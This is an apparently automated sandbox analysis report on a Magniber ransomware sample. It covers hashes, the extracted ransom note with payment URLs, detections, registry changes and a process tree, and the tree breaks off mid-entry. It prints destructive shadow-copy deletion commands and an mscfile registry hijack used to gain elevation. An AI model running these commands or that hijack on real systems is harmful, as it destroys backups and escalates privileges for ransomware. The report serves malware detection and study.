magniber | 4bf92967b0d2aabec0cb16f3c3792e714857db3e41ad5768e3493780b9342465

Analysis

max time kernel
120s
max time network
136s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cd711f77c71b93a29494bba27afebb32.dll
Size

38KB
MD5

cd711f77c71b93a29494bba27afebb32
SHA1

a0d84f184191454e90d4bb2b7df52f8428a3b387
SHA256

4bf92967b0d2aabec0cb16f3c3792e714857db3e41ad5768e3493780b9342465
SHA512

5ad95f1fd3365a51d6438f054ecc7b849a3ef8197592403504e227402629b7b482e403e652aa0da36c7dd4f6733351639497c1de6d58df51876b906d7b261bec
SSDEEP

768:e04Jtvq/PbXsmSh5Mj13C05bRUSMI2mpKghGR5ZL4Z/DtChqYWrYBZF:MJtvupS/Mj13CAUTI2mpF85ZcZ/JSN

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://6064f8e844d84a50aokdpgmu.hy5tprdl77synlgxroueyzpat4iszkkx52r4i3ufbg6l7b32zqkyc5ad.onion/okdpgmu Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://6064f8e844d84a50aokdpgmu.iflook.club/okdpgmu http://6064f8e844d84a50aokdpgmu.metthe.top/okdpgmu http://6064f8e844d84a50aokdpgmu.keystwo.uno/okdpgmu http://6064f8e844d84a50aokdpgmu.sameleg.site/okdpgmu Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://6064f8e844d84a50aokdpgmu.hy5tprdl77synlgxroueyzpat4iszkkx52r4i3ufbg6l7b32zqkyc5ad.onion/okdpgmu

http://6064f8e844d84a50aokdpgmu.iflook.club/okdpgmu

http://6064f8e844d84a50aokdpgmu.metthe.top/okdpgmu

http://6064f8e844d84a50aokdpgmu.keystwo.uno/okdpgmu

http://6064f8e844d84a50aokdpgmu.sameleg.site/okdpgmu

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2956-22-0x0000000001CF0000-0x0000000002533000-memory.dmp	family_magniber
behavioral1/memory/1112-133-0x00000000004F0000-0x00000000004F4000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2668	2256	cmd.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2552	2256	cmd.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	2256	cmd.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	2256	cmd.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	2256	cmd.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	2256	vssadmin.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1388	2256	vssadmin.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1180	2256	vssadmin.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	860	2256	vssadmin.exe	48
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2308	2256	vssadmin.exe	48

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (64) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

Processes:

rundll32.exe

description	pid	Process	procid_target
PID 2956 set thread context of 1112	2956	rundll32.exe	19
PID 2956 set thread context of 1192	2956	rundll32.exe	20
PID 2956 set thread context of 1240	2956	rundll32.exe	21
PID 2956 set thread context of 1780	2956	rundll32.exe	23

Interacts with shadow copies 2 TTPs 5 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
860	vssadmin.exe
2308	vssadmin.exe
876	vssadmin.exe
1388	vssadmin.exe
1180	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007823eddbcee3e149bc4db86b21295af600000000020000000000106600000001000020000000e06d67b4f065d6032f7b6a599947933cc8156856884f09dda9e1f9d9f8d7a78a000000000e80000000020000200000004ec4107652a9b85b553e97a9eef3ec451fdc2424a38709c8a690159af1900759900000002708916437452b59bdec5eb9f2c253747fcc8b6ed0324b5f7731969494b921b7c086bfe2eb1dbba7c1632958996bbc1e13cd676a58e52d73b50b05d53eeed71b3c2bdd18e22bd046ce098d94522f26196e0af22bfe4be34aaa4bb1b8a6f4f7ba7b2e643788e0ae10918d34da2636b505daa5c70f7f2b33b2ff577d24daece0d9ea40b82e3b1c7960e3a098122cd7183940000000876c97b18358099028e27945b393397e89218ce6d08b775ae64d6ea59cb07f3ab698c092fb3117f2418d9275637a9457556b5b2063044a8b79056e670771a19e	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "416735059"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A3F7F861-E364-11EE-9782-6A55B5C6A64E} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007823eddbcee3e149bc4db86b21295af600000000020000000000106600000001000020000000b97e5dde806d6ed3c5040a100d3e7e760a4e17c55798e1f54c7a9489f690d6fc000000000e8000000002000020000000b00f9de2b493d3116d3ee6e99c1c080c62eb1e60f947971abdc17fa398da7f8e200000001aa8924092c0e960bb4953f2061075d23945a91d3e3a675981a1605a40cd0a30400000002301f0e83d080edd67ce38c1637109376fdf4b2087c7d6c8cc566e3a84fe11f9f6acc45ae2dd57dbb2849d07b271e273cbdc8c0c2b3f75a4e3e7ac9f38d47ae1	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c05a88797177da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Modifies registry class 13 IoCs

Processes:

rundll32.exeExplorer.EXEDwm.exeDllHost.exetaskhost.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\mscfile\shell\open\command	Dwm.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
2112	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
2956	rundll32.exe
2956	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

rundll32.exe

pid	Process
2956	rundll32.exe
2956	rundll32.exe
2956	rundll32.exe
2956	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEWMIC.exeWMIC.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1200	WMIC.exe
Token: SeSecurityPrivilege	1200	WMIC.exe
Token: SeTakeOwnershipPrivilege	1200	WMIC.exe
Token: SeLoadDriverPrivilege	1200	WMIC.exe
Token: SeSystemProfilePrivilege	1200	WMIC.exe
Token: SeSystemtimePrivilege	1200	WMIC.exe
Token: SeProfSingleProcessPrivilege	1200	WMIC.exe
Token: SeIncBasePriorityPrivilege	1200	WMIC.exe
Token: SeCreatePagefilePrivilege	1200	WMIC.exe
Token: SeBackupPrivilege	1200	WMIC.exe
Token: SeRestorePrivilege	1200	WMIC.exe
Token: SeShutdownPrivilege	1200	WMIC.exe
Token: SeDebugPrivilege	1200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1200	WMIC.exe
Token: SeRemoteShutdownPrivilege	1200	WMIC.exe
Token: SeUndockPrivilege	1200	WMIC.exe
Token: SeManageVolumePrivilege	1200	WMIC.exe
Token: 33	1200	WMIC.exe
Token: 34	1200	WMIC.exe
Token: 35	1200	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2608	WMIC.exe
Token: SeSecurityPrivilege	2608	WMIC.exe
Token: SeTakeOwnershipPrivilege	2608	WMIC.exe
Token: SeLoadDriverPrivilege	2608	WMIC.exe
Token: SeSystemProfilePrivilege	2608	WMIC.exe
Token: SeSystemtimePrivilege	2608	WMIC.exe
Token: SeProfSingleProcessPrivilege	2608	WMIC.exe
Token: SeIncBasePriorityPrivilege	2608	WMIC.exe
Token: SeCreatePagefilePrivilege	2608	WMIC.exe
Token: SeBackupPrivilege	2608	WMIC.exe
Token: SeRestorePrivilege	2608	WMIC.exe
Token: SeShutdownPrivilege	2608	WMIC.exe
Token: SeDebugPrivilege	2608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2608	WMIC.exe
Token: SeRemoteShutdownPrivilege	2608	WMIC.exe
Token: SeUndockPrivilege	2608	WMIC.exe
Token: SeManageVolumePrivilege	2608	WMIC.exe
Token: 33	2608	WMIC.exe
Token: 34	2608	WMIC.exe
Token: 35	2608	WMIC.exe
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeShutdownPrivilege	1240	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1404	WMIC.exe
Token: SeSecurityPrivilege	1404	WMIC.exe
Token: SeTakeOwnershipPrivilege	1404	WMIC.exe
Token: SeLoadDriverPrivilege	1404	WMIC.exe
Token: SeSystemProfilePrivilege	1404	WMIC.exe
Token: SeSystemtimePrivilege	1404	WMIC.exe
Token: SeProfSingleProcessPrivilege	1404	WMIC.exe
Token: SeIncBasePriorityPrivilege	1404	WMIC.exe
Token: SeCreatePagefilePrivilege	1404	WMIC.exe
Token: SeBackupPrivilege	1404	WMIC.exe
Token: SeRestorePrivilege	1404	WMIC.exe
Token: SeShutdownPrivilege	1404	WMIC.exe
Token: SeDebugPrivilege	1404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1404	WMIC.exe
Token: SeRemoteShutdownPrivilege	1404	WMIC.exe
Token: SeUndockPrivilege	1404	WMIC.exe
Token: SeManageVolumePrivilege	1404	WMIC.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

iexplore.exeExplorer.EXE

pid	Process
752	iexplore.exe
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE
1240	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

Processes:

Explorer.EXE

pid	Process
1240	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid	Process
752	iexplore.exe
752	iexplore.exe
2636	IEXPLORE.EXE
2636	IEXPLORE.EXE
2636	IEXPLORE.EXE
2636	IEXPLORE.EXE

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
1240	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

taskhost.execmd.exeExplorer.EXEDwm.exeDllHost.execmd.exerundll32.execmd.execmd.execmd.execmd.exeiexplore.execmd.execmd.execmd.execmd.execmd.exeCompMgmtLauncher.exeCompMgmtLauncher.exe

description	pid	Process	procid_target
PID 1112 wrote to memory of 2112	1112	taskhost.exe	28
PID 1112 wrote to memory of 2112	1112	taskhost.exe	28
PID 1112 wrote to memory of 2112	1112	taskhost.exe	28
PID 1112 wrote to memory of 2864	1112	taskhost.exe	30
PID 1112 wrote to memory of 2864	1112	taskhost.exe	30
PID 1112 wrote to memory of 2864	1112	taskhost.exe	30
PID 1112 wrote to memory of 2092	1112	taskhost.exe	31
PID 1112 wrote to memory of 2092	1112	taskhost.exe	31
PID 1112 wrote to memory of 2092	1112	taskhost.exe	31
PID 2092 wrote to memory of 2608	2092	cmd.exe	34
PID 2092 wrote to memory of 2608	2092	cmd.exe	34
PID 2092 wrote to memory of 2608	2092	cmd.exe	34
PID 1240 wrote to memory of 620	1240	Explorer.EXE	35
PID 1240 wrote to memory of 620	1240	Explorer.EXE	35
PID 1240 wrote to memory of 620	1240	Explorer.EXE	35
PID 1192 wrote to memory of 2076	1192	Dwm.exe	36
PID 1192 wrote to memory of 2076	1192	Dwm.exe	36
PID 1192 wrote to memory of 2076	1192	Dwm.exe	36
PID 1780 wrote to memory of 2192	1780	DllHost.exe	38
PID 1780 wrote to memory of 2192	1780	DllHost.exe	38
PID 1780 wrote to memory of 2192	1780	DllHost.exe	38
PID 2192 wrote to memory of 1200	2192	cmd.exe	41
PID 2192 wrote to memory of 1200	2192	cmd.exe	41
PID 2192 wrote to memory of 1200	2192	cmd.exe	41
PID 2956 wrote to memory of 684	2956	rundll32.exe	42
PID 2956 wrote to memory of 684	2956	rundll32.exe	42
PID 2956 wrote to memory of 684	2956	rundll32.exe	42
PID 620 wrote to memory of 1404	620	cmd.exe	43
PID 620 wrote to memory of 1404	620	cmd.exe	43
PID 620 wrote to memory of 1404	620	cmd.exe	43
PID 2076 wrote to memory of 1344	2076	cmd.exe	44
PID 2076 wrote to memory of 1344	2076	cmd.exe	44
PID 2076 wrote to memory of 1344	2076	cmd.exe	44
PID 684 wrote to memory of 676	684	cmd.exe	46
PID 684 wrote to memory of 676	684	cmd.exe	46
PID 684 wrote to memory of 676	684	cmd.exe	46
PID 2864 wrote to memory of 752	2864	cmd.exe	47
PID 2864 wrote to memory of 752	2864	cmd.exe	47
PID 2864 wrote to memory of 752	2864	cmd.exe	47
PID 752 wrote to memory of 2636	752	iexplore.exe	49
PID 752 wrote to memory of 2636	752	iexplore.exe	49
PID 752 wrote to memory of 2636	752	iexplore.exe	49
PID 752 wrote to memory of 2636	752	iexplore.exe	49
PID 2552 wrote to memory of 2436	2552	cmd.exe	60
PID 2552 wrote to memory of 2436	2552	cmd.exe	60
PID 2552 wrote to memory of 2436	2552	cmd.exe	60
PID 2668 wrote to memory of 2452	2668	cmd.exe	61
PID 2668 wrote to memory of 2452	2668	cmd.exe	61
PID 2668 wrote to memory of 2452	2668	cmd.exe	61
PID 1580 wrote to memory of 2548	1580	cmd.exe	62
PID 1580 wrote to memory of 2548	1580	cmd.exe	62
PID 1580 wrote to memory of 2548	1580	cmd.exe	62
PID 1588 wrote to memory of 2708	1588	cmd.exe	63
PID 1576 wrote to memory of 2464	1576	cmd.exe	64
PID 1588 wrote to memory of 2708	1588	cmd.exe	63
PID 1588 wrote to memory of 2708	1588	cmd.exe	63
PID 1576 wrote to memory of 2464	1576	cmd.exe	64
PID 1576 wrote to memory of 2464	1576	cmd.exe	64
PID 2436 wrote to memory of 2812	2436	CompMgmtLauncher.exe	65
PID 2436 wrote to memory of 2812	2436	CompMgmtLauncher.exe	65
PID 2436 wrote to memory of 2812	2436	CompMgmtLauncher.exe	65
PID 2452 wrote to memory of 2696	2452	CompMgmtLauncher.exe	67
PID 2452 wrote to memory of 2696	2452	CompMgmtLauncher.exe	67
PID 2452 wrote to memory of 2696	2452	CompMgmtLauncher.exe	67

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2112
- C:\Windows\system32\cmd.exe
  cmd /c "start http://6064f8e844d84a50aokdpgmu.iflook.club/okdpgmu^&2^&42397824^&64^&313^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://6064f8e844d84a50aokdpgmu.iflook.club/okdpgmu&2&42397824&64&313&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:752
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:752 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2636
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2608

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1344

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\cd711f77c71b93a29494bba27afebb32.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:676
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1404

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1780
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1200

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2696

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2552
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2812

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2464
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1660

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2708
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1636

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2548
- - C:\Windows\system32\wbem\wmic.exe
